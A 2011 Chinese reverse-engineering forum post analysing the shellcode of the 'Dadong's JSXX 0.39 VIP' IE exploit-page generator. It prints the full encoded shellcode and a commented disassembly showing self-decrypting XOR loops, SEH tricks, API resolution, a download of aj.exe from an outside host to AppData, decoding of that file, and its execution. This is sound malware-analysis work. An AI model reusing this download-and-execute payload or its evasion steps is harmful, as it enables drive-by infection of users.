Dadong's JSXX 0.39 VIP所用shellcode调试
标 题: 【原创】Dadong's JSXX 0.39 VIP所用shellcode调试
作 者: promised(ID注册时打错了,不知道能不能改名)
时 间: 2011-04-09, 23:03:26
链 接: http://bbs.pediy.com/showthread.php?t=132109
Dadong's JSXX 0.39 VIP是IE极风漏洞网马的一种生成器。
其所用shellcode多次自修改,并修改shellcode所下载的exe文件,使shellcode的静态分析变得困难。
由于这个shellcode用libemu模拟失败,于是只好自己分析了。本人非常菜,如有错误还请各位指正。
shellcode如下,将其嵌入exe调试
%u9090%u9090%uC233%uD8E8%u0003%u9A00%u3037%u8DA0%u1925%u4B39%uB944%u58DA%uE5E2%u8E7B%uA401%u0AC7%u2664%u27D9%u8DAA%u68BF%uF979%uC1D1%u1AE3%uCF08%u54ED%u456B%u54B7%u3E20%uBF50%u2F8A%u1CA8%uECAD%u81B9%u887F%u3982%u50DA%uB081%uE527%u7B56%u0AB4%uF357%uB8BE%u370F%uF254%u6BAE%uB37D%u8D6D%u0C40%u8773%uC4FA%u26F8%uF87D%uAE4E%u56D0%u661F%u606C%u801D%u6738%u26A6%u31C9%uAFE5%uF62C%uED8B%uDA50%u6541%u1C67%uA81D%u7633%uE19F%u3FA5%u07B3%u88F9%u0961%uBCA2%uA8CA%u7476%u23B9%uD289%uEF0E%uEE89%u0A0F%uF9F9%u5151%uC181%u90A4%u10CC%u7F8A%uBB74%uB458%uBC46%uF1B1%u9E94%uFB06%uD21F%uF8C0%u0430%uD0D5%uB8DD%uBA41%uF250%uFFAB%uCDA3%u264A%u5899%u8281%u3E9E%uF7E7%uFA8D%u16CF%u0228%uF532%uF0AF%u7EC3%uA699%u330C%u62CB%u9314%uFC1E%u23D7%uD33F%u9C90%u758A%uEA67%u86D0%u0EB8%u23D8%u17C0%uDB2B%u9BED%u897B%u4311%u284A%uE23F%u1D96%u01E4%u40E7%uCA8D%u1D34%u2EE9%uB241%u048B%u4B56%u6D09%u1CE0%u475C%uCEA6%u0E89%uAC48%u0AE0%uFF56%u60C7%u500A%uC031%u01D9%uA36A%uC1D2%u2E7F%uF3B8%uDDBC%uA477%uA397%u566C%u4FA5%u4443%u766E%uBFC9%u10F0%u78BB%u315C%u0FD1%u94BD%u1AF9%u84FF%u6F49%u5A99%uC4EC%u18BA%u6A09%u93FB%uBABB%uF41B%u29CD%u57B1%u205A%uF1EE%uA1E3%u9197%u8EF4%u70D6%u43AE%uD000%u329C%uE373%u7F99%u9900%u6230%uEDE1%uFD81%uC18E%u3C9F%uD0E5%u0D56%u700D%u5605%u38F5%u1473%uA945%uCA6D%u57EC%u29AB%u5D79%u816D%uD954%u0CBC%uCB8F%uF0A0%u257F%u2E9F%u07E6%u0A16%u6FAD%u0FB7%u45F8%uC0C9%u524D%u35D3%uD8C4%u712B%uD364%u373B%u1073%u489B%u729B%u9D4A%uADA7%u7935%u54CF%uC53E%uD412%u6D94%u9F6C%u443F%u7E15%uB227%uAFA1%u8F01%uCB83%u2429%u4FFE%u331A%u12B2%u2EC4%u5A67%uA5B9%u5130%u90A2%u9435%uC452%u1743%uFD5D%uBC77%uC888%u8DC7%uAEB7%uF94E%u9D04%uF007%u8D6C%u007E%u58FC%uE225%u047E%u0D6B%u18F1%u7DDD%uD298%u5C54%uCFF8%uDBEF%u9BB3%u5BDB%u2900%uA940%u01DF%uA01A%uB38C%u2BA3%u8CB6%u8BE9%u1944%u7BCE%uD695%u079F%u87EB%u372C%uB836%u86ED%u6DEA%uE69A%uAD51%uC5BC%uDF66%u26AE%uF8C2%u8C87%u0604%u0038%uAB9A%u05AA%u2725%uF832%u2B3A%u3B7C%uC4F1%u6620%u89B3%uAF49%u1E21%u2781%u73A8%u41C8%u3DD7%u9F9E%uBAC9%u440C%uF7BF%uDC9F%uF434%u4DA8%uFAD5%uF569%uFCD3%u4CC7%u0AFE%u17CC%u5CEA%uB621%u9A39%u4A23%u41A8%u3910%u08DF%u944B%u58FE%u739A%u65F7%u3064%u763E%u9FAE%uD311%u5822%uE112%uB801%uBF3B%u1AF0%u8D7F%uA539%u4D3B%uD0EA%uEDCA%u6894%u6F72%uF844%u1142%uFD94%u9088%u5212%uC41F%u1AC0%u1ED0%u82BD%u2278%u7806%u294F%uC172%uFF9C%uA582%uBEBA%u92D7%uAE52%uA058%uA31B%u54D9%u12D0%u0AA7%uF6B2%u4253%u01AD%u4B04%u824E%u773E%u8660%u5C53%u0B91%u485A%u1597%uAA0B%u824F%uD5E6%u39D5%u037F%u0F2E%u8165%u1EA6%uDB2B%u188B%u2FCB%u3BD3%u6F00%uF0FC%u6979%uE0B9%u9463%u15A0%u7AE6%uAF06%uCD44%u049F%uB448%u9164%uB82D%u1E61%u1A55%u84D3%uB240%uDFEC%uD986%u0490%u0F70%uD322%u5241%u38FA%uC271%uDE9E%u1226%uB309%u4767%uAFEB%u97E5%uC525%u8093%uF1CB%uC556%u3CB7%u113F%uD0F9%uC88A%uED85%uC6E2%u2452%uD349%u04B6%uF971%uA972%u3A89%u387D%uDA77%u0302%uF95C%uAB9D%uBB16%u024A%u799A%u637C%u9D11%u78F1%u312B%u80C4%u87D5%u692C%u445D%u2304%uDF8D%u51A6%u6935%uF124%u9241%uF600%u3E7C%u25DF%u5F05%u10A6%uF384%u1DB4%u1EF2%u8205%uB2C0%u987A%uB761%u4D45%u160F%u0695%uF134%u3BE4%u50DD%uEC34%u648A%u3350%uFCC4%uE860%u0006%u0000%u648B%u0824%u0CEB%uDB33%uFF64%u6433%u2389%u03FF%uE8EB%uC733%u2BD6%u64C9%u018F%uE859%u0000%u0000%uC203%u2C8B%u5824%uED81%u3860%u0015%uC70B%u68D6%uD352%u30B5%u815F%u0DF7%uA0E7%uC130%u39C8%uFD03%uDB68%uA0EA%u5B30%uF381%uEA2D%u30A0%uC21B%u0ABA%uA0A7%u3330%u40C0%u1731%u4893%uC193%uD7F8%u09E8%u0000%u8B00%uE9C0%u0009%u0000%uC50B%u2BF8%uC3C5%uD8C1%uF9BF%u4747%u4747%uE898%u0008%u0000%u07E9%u0000%u9000%uC28B%u73F9%uC36F%u33F9%u81C7%uCBC2%uA0D6%u0330%u51C2%uCB8B%u03E3%uEB59%u59B9%uC233%uC361
模块入口点:
00405030 90 NOP
00405031 90 NOP
00405032 90 NOP
00405033 90 NOP
00405034 33C2 XOR EAX,EDX
00405036 E8 D8030000 CALL 00405413
0040503B 9A 3730A08D 2519 CALL FAR 1925:8DA03037 ;这里开始代码就不正常了,先忽略
调用00405413:
00405413 33C4 XOR EAX,ESP
00405415 FC CLD
00405416 60 PUSHAD
00405417 E8 06000000 CALL 00405422 ;返回地址0040541C入栈
调用00405422:
00405422 33DB XOR EBX,EBX ;EBX清零
00405424 64:FF33 PUSH DWORD PTR FS:[EBX] ;指向下一个SEH记录的指针
00405427 64:8923 MOV DWORD PTR FS:[EBX],ESP
0040542A FF03 INC DWORD PTR DS:[EBX] ;EBX=0,产生异常,异常处理函数即为0040541C
异常处理程序如何被调用:
具体参考
http://bbs.pediy.com/showthread.php?t=65783
http://www.microsoft.com/msj/0197/exception/exception.aspx
int ExecuteHandler( PEXCEPTION_RECORD pExcptRec,
PEXCEPTION_REGISTRATION pExcptReg,
CONTEXT *pContext,
PVOID pDispatcherContext,
FARPROC handler )
{
77F8EB4A 55 PUSH EBP
77F8EB4B 8BEC MOV EBP,ESP
77F8EB4D FF75 0C PUSH DWORD PTR SS:[EBP+C] ;pExcptReg
77F8EB50 52 PUSH EDX
77F8EB51 64:FF35 00000000 PUSH DWORD PTR FS:[0]
77F8EB58 64:8925 00000000 MOV DWORD PTR FS:[0],ESP
77F8EB5F FF75 14 PUSH DWORD PTR SS:[EBP+14] ;pDispatcherContext
77F8EB62 FF75 10 PUSH DWORD PTR SS:[EBP+10] ;pContext
77F8EB65 FF75 0C PUSH DWORD PTR SS:[EBP+C] ;pExcptReg
77F8EB68 FF75 08 PUSH DWORD PTR SS:[EBP+8] ;pExcptRec
77F8EB6B 8B4D 18 MOV ECX,DWORD PTR SS:[EBP+18] ;ECX=异常处理函数handler
77F8EB6E FFD1 CALL ECX ;调用异常处理函数
77F8EB70 64:8B25 00000000 MOV ESP,DWORD PTR FS:[0]
77F8EB77 64:8F05 00000000 POP DWORD PTR FS:[0]
77F8EB7E 8BE5 MOV ESP,EBP
77F8EB80 5D POP EBP
77F8EB81 C2 1400 RETN 14
}
异常处理函数0040541C:
0040541C 8B6424 08 MOV ESP,DWORD PTR SS:[ESP+8] ;pExcptReg,这个pExcptReg是0040542A处异常的EXCEPTION_REGISTRATION链表的头,即pExcptReg=0040542A处的ESP,这里ESP退到了0040542A处的ESP
00405420 EB 0C JMP SHORT 0040542E
跳转到0040542E:
0040542E 33C7 XOR EAX,EDI
00405430 D6 SALC
00405431 2BC9 SUB ECX,ECX
00405433 64:8F01 POP DWORD PTR FS:[ECX]
00405436 59 POP ECX
00405437 E8 00000000 CALL 0040543C ;返回地址0040543C入栈
调用0040543C:
0040543C 03C2 ADD EAX,EDX
0040543E 8B2C24 MOV EBP,DWORD PTR SS:[ESP] ;EBP=0040543C
00405441 58 POP EAX
00405442 81ED 60381500 SUB EBP,153860 ;EBP=0040543C-153860=002B1BDC
00405448 0BC7 OR EAX,EDI
0040544A D6 SALC
0040544B 68 52D3B530 PUSH 30B5D352
00405450 5F POP EDI ;EDI=30B5D352
00405451 81F7 0DE7A030 XOR EDI,30A0E70D ;EDI=30B5D352^30A0E70D=0015345F
00405457 C1C8 39 ROR EAX,39
0040545A 03FD ADD EDI,EBP ;EDI=0015345F+002B1BDC=0040503B,即为最初看到的不正常代码的地址
0040545C 68 DBEAA030 PUSH 30A0EADB
00405461 5B POP EBX ;EBX=30A0EADB
00405462 81F3 2DEAA030 XOR EBX,30A0EA2D ;EBX=30A0EADB^30A0EA2D=000000F6,循环次数初始值
00405468 1BC2 SBB EAX,EDX
0040546A BA 0AA7A030 MOV EDX,30A0A70A ;EDX=30A0A70A,XOR密钥初始值
0040546F 33C0 XOR EAX,EAX
00405471 40 INC EAX
自修改1:
00405472 3117 XOR DWORD PTR DS:[EDI],EDX ;处次执行时修改0040503B处不正常的代码,A030379A^30A0A70A=90909090,即填充为NOP,并开始循环
00405474 93 XCHG EAX,EBX
00405475 48 DEC EAX
00405476 93 XCHG EAX,EBX ;EBX=EBX-1,循环次数递减
00405477 C1F8 D7 SAR EAX,0D7
0040547A E8 09000000 CALL 00405488
调用00405488:
00405488 F8 CLC
00405489 2BC5 SUB EAX,EBP
0040548B C3 RETN
返回到0040547F:
0040547F 8BC0 MOV EAX,EAX
00405481 E9 09000000 JMP 0040548F
跳转到0040548F:
0040548F F9 STC
00405490 47 INC EDI
00405491 47 INC EDI
00405492 47 INC EDI
00405493 47 INC EDI ;EDI=EDI+4,需要修改的下一段代码的地址
00405494 98 CWDE
00405495 E8 08000000 CALL 004054A2
调用004054A2:
004054A2 F9 STC
004054A3 73 6F JNB SHORT 00405514 ;跳转不会实现
004054A5 C3 RETN
返回到0040549A:
0040549A /E9 07000000 JMP 004054A6
跳转到004054A6:
004054A6 F9 STC
004054A7 33C7 XOR EAX,EDI
004054A9 81C2 CBD6A030 ADD EDX,30A0D6CB ;EDX=EDX+30A0D6CB,XOR密钥变换
004054AF 03C2 ADD EAX,EDX
004054B1 51 PUSH ECX
004054B2 8BCB MOV ECX,EBX ;ECX=循环次数EBX
004054B4 E3 03 JECXZ SHORT 004054B9 ;ECX等于0则跳转到004054B9,即结束循环
004054B6 59 POP ECX
004054B7 ^ EB B9 JMP SHORT 00405472 ;跳转到自修改1,不记初次修改共循环F5次
004054B9 59 POP ECX
004054BA 33C2 XOR EAX,EDX
004054BC 61 POPAD
004054BD C3 RETN
循环结束,部分不正常的代码被恢复,返回到0040503B:
0040503B 90 NOP
0040503C 90 NOP
0040503D 90 NOP
0040503E 90 NOP
0040503F 58 POP EAX
00405040 58 POP EAX
00405041 58 POP EAX
00405042 58 POP EAX
00405043 EB 10 JMP SHORT 00405055
跳转到00405055:
00405055 E8 EBFFFFFF CALL 00405045 ;返回地址0040505A入栈
调用00405045:
00405045 5B POP EBX ;EBX=0040505A
00405046 4B DEC EBX
00405047 33C9 XOR ECX,ECX
00405049 66:B9 B803 MOV CX,3B8 ;ECX=3B8,循环次数
自修改2:
0040504D 80340B BD XOR BYTE PTR DS:[EBX+ECX],0BD ;XOR密钥固定为BD
00405051 ^ E2 FA LOOPD SHORT 0040504D
00405053 EB 05 JMP SHORT 0040505A
循环结束,所有不正常的代码被恢复,跳转到0040505A:
0040505A /E9 1E030000 JMP 0040537D
跳转到0040537D:
0040537D E8 DDFCFFFF CALL 0040505F
调用0040505F:
0040505F 5F POP EDI ;定位自身地址,以后查找到的函数的地址将依次保存到以该地址为起始的一段内存中
00405060 64:A1 30000000 MOV EAX,DWORD PTR FS:[30] ;PEB
00405066 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
00405069 8B70 1C MOV ESI,DWORD PTR DS:[EAX+1C]
0040506C AD LODS DWORD PTR DS:[ESI]
0040506D 8B68 08 MOV EBP,DWORD PTR DS:[EAX+8] ;EBP=kernel32.dll模块基地址
00405070 8BF7 MOV ESI,EDI
00405072 6A 11 PUSH 11
00405074 59 POP ECX ;所要查找的函数个数ECX=11
00405075 E8 BE020000 CALL 00405338 ;遍历kernel32.dll的导出表,查找函数GetModuleHandleA,GetTempPathA,CreateProcessInternalA,LoadLibraryA,GetProcAddress,ExitProcess,GetCurrentThreadId,Sleep,VirtualProtect,CreateFileA,GetFileSize,CreateFileMappingA,WriteFile,CloseHandle,SetFilePointer,MapViewOfFile,UnmapViewOfFile,并将地址依次保存
0040507A 90 NOP
0040507B ^ E2 F8 LOOPD SHORT 00405075
0040507D 68 33320000 PUSH 3233
00405082 68 55736572 PUSH 72657355
00405087 54 PUSH ESP ;"User32"
00405088 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C]
0040508B E8 BE010000 CALL 0040524E ;LoadLibraryA("User32")
00405090 8BE8 MOV EBP,EAX ;EBP=User32.dll模块基地址
00405092 6A 05 PUSH 5
00405094 59 POP ECX ;所要查找的函数个数ECX=5
00405095 E8 9E020000 CALL 00405338 ;遍历User32.dll的导出表,查找函数EnumWindows,GetClassNameA,GetWindowThreadProcessId,DestroyWindow,MessageBeep,并将地址依次保存
0040509A ^ E2 F9 LOOPD SHORT 00405095
0040509C 68 6F6E0000 PUSH 6E6F
004050A1 68 75726C6D PUSH 6D6C7275
004050A6 54 PUSH ESP ;"urlmon"
004050A7 FF16 CALL DWORD PTR DS:[ESI] ;GetModuleHandleA("urlmon")
004050A9 85C0 TEST EAX,EAX
004050AB 75 13 JNZ SHORT 004050C0 ;判断urlmon.dll模块是否已载入,已载入则跳转
004050AD 68 6F6E0000 PUSH 6E6F
004050B2 68 75726C6D PUSH 6D6C7275
004050B7 54 PUSH ESP ;"urlmon"
004050B8 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C]
004050BB E8 8E010000 CALL 0040524E ;LoadLibraryA("urlmon")
004050C0 8BE8 MOV EBP,EAX ;EBP=urlmon.dll模块基地址
004050C2 6A 01 PUSH 1
004050C4 59 POP ECX ;所要查找的函数个数ECX=1
004050C5 E8 6E020000 CALL 00405338 ;遍历User32.dll的导出表,查找函数URLDownloadToFileA,并将地址保存
004050CA ^ E2 F9 LOOPD SHORT 004050C5
004050CC 68 6C333200 PUSH 32336C
004050D1 68 7368656C PUSH 6C656873
004050D6 54 PUSH ESP ;"shell32"
004050D7 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C]
004050DA E8 6F010000 CALL 0040524E ;LoadLibraryA("shell32")
004050DF 8BE8 MOV EBP,EAX ;EBP=shell32.dll模块基地址
004050E1 6A 01 PUSH 1 ;所要查找的函数个数ECX=1
004050E3 59 POP ECX
004050E4 E8 4F020000 CALL 00405338 ;遍历shell32.dll的导出表,查找函数SHGetSpecialFolderPathA,并将地址保存
004050E9 ^ E2 F9 LOOPD SHORT 004050E4
004050EB 81EC 00010000 SUB ESP,100
004050F1 8BDC MOV EBX,ESP
004050F3 81C3 80000000 ADD EBX,80
004050F9 6A 00 PUSH 0
004050FB 6A 1A PUSH 1A
004050FD 53 PUSH EBX
004050FE 6A 00 PUSH 0
00405100 FF56 5C CALL DWORD PTR DS:[ESI+5C] ;SHGetSpecialFolderPathA(0, EBX, CSIDL_APPDATA, 0),获得Application Data路径
00405103 33C0 XOR EAX,EAX
00405105 40 INC EAX
00405106 803C03 00 CMP BYTE PTR DS:[EBX+EAX],0
0040510A ^ 75 F9 JNZ SHORT 00405105 ;遍历Application Data路径字符串到结束符
0040510C C70403 5C612E65 MOV DWORD PTR DS:[EBX+EAX],652E615C
00405113 C74403 04 78650000 MOV DWORD PTR DS:[EBX+EAX+4],6578 ;"a.exe"连接到Application Data路径字符串
0040511B 33C9 XOR ECX,ECX
0040511D 51 PUSH ECX
0040511E 51 PUSH ECX
0040511F 53 PUSH EBX
00405120 57 PUSH EDI
00405121 51 PUSH ECX
00405122 33C0 XOR EAX,EAX
00405124 8B46 58 MOV EAX,DWORD PTR DS:[ESI+58]
00405127 E8 22010000 CALL 0040524E ;URLDownloadToFileA(0, "http://jiekefa8e.info/aj.exe", Application Data目录下的a.exe, 0, 0)
0040512C 83F8 00 CMP EAX,0
0040512F 0F85 D5000000 JNZ 0040520A ;判断是否下载成功,失败则跳转0040520A
00405135 6A 00 PUSH 0
00405137 6A 00 PUSH 0
00405139 6A 03 PUSH 3
0040513B 6A 00 PUSH 0
0040513D 6A 02 PUSH 2
0040513F 68 000000C0 PUSH C0000000
00405144 53 PUSH EBX
00405145 8B46 24 MOV EAX,DWORD PTR DS:[ESI+24]
00405148 E8 01010000 CALL 0040524E ;hFile=EAX=CreateFileA(Application Data目录下的a.exe, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0)
0040514D 8946 60 MOV DWORD PTR DS:[ESI+60],EAX ;存hFile
00405150 6A 00 PUSH 0
00405152 50 PUSH EAX
00405153 FF56 28 CALL DWORD PTR DS:[ESI+28] ;dwFileSize=EAX=GetFileSize(hFile, 0)
00405156 8946 64 MOV DWORD PTR DS:[ESI+64],EAX ;存dwFileSize
00405159 8B46 60 MOV EAX,DWORD PTR DS:[ESI+60]
0040515C 6A 00 PUSH 0
0040515E 6A 00 PUSH 0
00405160 6A 00 PUSH 0
00405162 6A 04 PUSH 4
00405164 6A 00 PUSH 0
00405166 50 PUSH EAX
00405167 FF56 2C CALL DWORD PTR DS:[ESI+2C] ;hFileMapping=EAX=CreateFileMappingA(hFile, 0, PAGE_READWRITE, 0, 0, 0)
0040516A 6A 00 PUSH 0
0040516C 6A 00 PUSH 0
0040516E 6A 00 PUSH 0
00405170 68 1F000F00 PUSH 0F001F
00405175 50 PUSH EAX
00405176 FF56 3C CALL DWORD PTR DS:[ESI+3C] ;pbFile=EAX=MapViewOfFile(hFileMapping, FILE_MAP_ALL_ACCESS, 0, 0, 0)
00405179 8946 78 MOV DWORD PTR DS:[ESI+78],EAX ;存pbFile
0040517C 8B4E 64 MOV ECX,DWORD PTR DS:[ESI+64]
0040517F 807C08 FF A2 CMP BYTE PTR DS:[EAX+ECX-1],0A2
00405184 74 0C JE SHORT 00405192
00405186 807C08 FF 00 CMP BYTE PTR DS:[EAX+ECX-1],0
0040518B 74 05 JE SHORT 00405192
0040518D 807408 FF A2 XOR BYTE PTR DS:[EAX+ECX-1],0A2
00405192 ^ E2 EB LOOPD SHORT 0040517F ;修改所下载的文件,for(ECX=dwFileSize; ECX; ECX--) if (pbFile[ECX-1] != 0xA2 && pbFile[ECX-1] != 0) pbFile[ECX-1]^=0xA2
00405194 8986 80000000 MOV DWORD PTR DS:[ESI+80],EAX
0040519A C746 70 00000000 MOV DWORD PTR DS:[ESI+70],0
004051A1 C746 74 00000000 MOV DWORD PTR DS:[ESI+74],0
004051A8 6A 00 PUSH 0
004051AA 6A 00 PUSH 0
004051AC 6A 00 PUSH 0
004051AE 8B46 60 MOV EAX,DWORD PTR DS:[ESI+60]
004051B1 50 PUSH EAX
004051B2 FF56 38 CALL DWORD PTR DS:[ESI+38] ;作者似乎对内存映射文件理解有误,这里没有必要调用SetFilePointer
004051B5 8B86 80000000 MOV EAX,DWORD PTR DS:[ESI+80]
004051BB 6A 00 PUSH 0
004051BD 8D4E 74 LEA ECX,DWORD PTR DS:[ESI+74]
004051C0 51 PUSH ECX
004051C1 FF76 70 PUSH DWORD PTR DS:[ESI+70]
004051C4 50 PUSH EAX
004051C5 FF76 60 PUSH DWORD PTR DS:[ESI+60]
004051C8 FF56 30 CALL DWORD PTR DS:[ESI+30] ;作者似乎对内存映射文件理解有误,这里没有必要调用WriteFile
004051CB FF76 60 PUSH DWORD PTR DS:[ESI+60]
004051CE FF56 34 CALL DWORD PTR DS:[ESI+34] ;CloseHandle(hFile)
004051D1 FF76 78 PUSH DWORD PTR DS:[ESI+78]
004051D4 FF56 40 CALL DWORD PTR DS:[ESI+40] ;UnmapViewOfFile(pbFile)
004051D7 8BFB MOV EDI,EBX
004051D9 33C0 XOR EAX,EAX
004051DB 33DB XOR EBX,EBX
004051DD 81EC 00020000 SUB ESP,200
004051E3 8BCC MOV ECX,ESP
004051E5 83F8 54 CMP EAX,54
004051E8 7D 08 JGE SHORT 004051F2
004051EA 891C01 MOV DWORD PTR DS:[ECX+EAX],EBX ;StartupInfo、ProcessInformation清0
004051ED 83C0 04 ADD EAX,4
004051F0 ^ EB F3 JMP SHORT 004051E5
004051F2 8BCC MOV ECX,ESP
004051F4 8BD9 MOV EBX,ECX
004051F6 83C3 10 ADD EBX,10
004051F9 33C0 XOR EAX,EAX
004051FB 50 PUSH EAX
004051FC 51 PUSH ECX
004051FD 53 PUSH EBX
004051FE 50 PUSH EAX
004051FF 50 PUSH EAX
00405200 50 PUSH EAX
00405201 50 PUSH EAX
00405202 50 PUSH EAX
00405203 50 PUSH EAX
00405204 57 PUSH EDI
00405205 50 PUSH EAX
00405206 50 PUSH EAX
00405207 FF56 08 CALL DWORD PTR DS:[ESI+8] ;CreateProcessInternalA(0, 0, Application Data目录下的a.exe, 0, 0, 0, 0, 0, 0, lpStartupInfo, lpProcessInformation, 0)
0040520A:shellcode该做的都做完了,之后的内容与本文关系不大了